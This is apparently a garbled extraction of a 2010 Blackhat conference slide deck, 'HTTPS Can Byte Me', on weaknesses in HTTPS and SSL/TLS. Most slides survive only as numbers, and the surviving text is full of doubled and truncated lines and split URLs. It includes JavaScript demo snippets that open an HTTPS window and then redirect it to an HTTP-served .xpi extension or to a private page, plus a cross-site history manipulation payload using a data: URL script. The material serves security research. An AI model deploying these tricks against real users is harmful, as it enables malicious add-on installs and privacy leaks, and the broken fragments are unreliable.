HTTPS Ca Blackhat Briefings Blackhat Briefings an Byte Me s November 2010
1
HTTPS Ca an Byte Me Blackhat Briefings Blackhat Briefings s - - PowerPoint PPT Presentation
HTTPS Ca an Byte Me Blackhat Briefings Blackhat Briefings s November 2010 s November, 2010 1 Robert RSnake Han nsen - CEO SecTheor Ltd SecTheory Ltd http://www.sectheory y.com/ - the company http //ha ckers org/
1
2
3
4
http://www.zdnetasia.com/insight/se
5
ecurity/0,39044829,62053759,00.htm
Identical cryptographic key
MACs are weakened in the
SSL v2 does not have any pr
SSL v2 uses the TCP connec
Doesn’t work on virtual hos
6
http://en.wikipedia.org/wik
7
ki/Transport_Layer_Security
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<a href="javascript:clickit();">Go to our HTTPS site</A> <script> function clickit() { var w = window open('https://www whatever com/main var w = window.open('https://www.whatever.com/main. setTimeout(function () { w.location = 'http://www.whatever.com/ffpopup.xpi'; }, 2000); } </script>
html'); .html');
31
<a href="javascript:clickit();">Go to our SSL/TLS website</A <script> function clickit() { var w = window open('https://www whatever com/main var w = window.open('https://www.whatever.com/main. setTimeout(function () { w.location = 'http://www.whatever.com/private/'; }, 2000); } </script>
A> html'); .html');
32
33
<a href="javascript:clickit();">Go to our HTTP <script> function clickit() { function clickit() { var w = window.open('https://www.whate check(w); } function check(a) { setTimeout(function () { a.location = 'data:text/html;utf-8,<script>a check(a); check(a); }, 4000); } </script> / p <noscript>Please enable JavaScript to see this
PS site</A> ever.com/ssl/main.html'); lert(history.length);history.go(-1);<\/script>'; s demo.</noscript>
ss_Site_History_Manipulation_(XSHM)
34
35
http://www.foundstone.com/us/resources/WebSec
36
c101/websec101_sessionmanagement_slides.pdf
37
When does doing login dete When can wildcards add ad
Double DNS rebinding + XS
38
39
40
41
http://research microsoft com/en-us/um/peopl http://research.microsoft.com/en us/um/peopl
le/cormac/papers/2009/SoLongAndNoThanks pdf le/cormac/papers/2009/SoLongAndNoThanks.pdf
42
43
44
45
46
47
48
49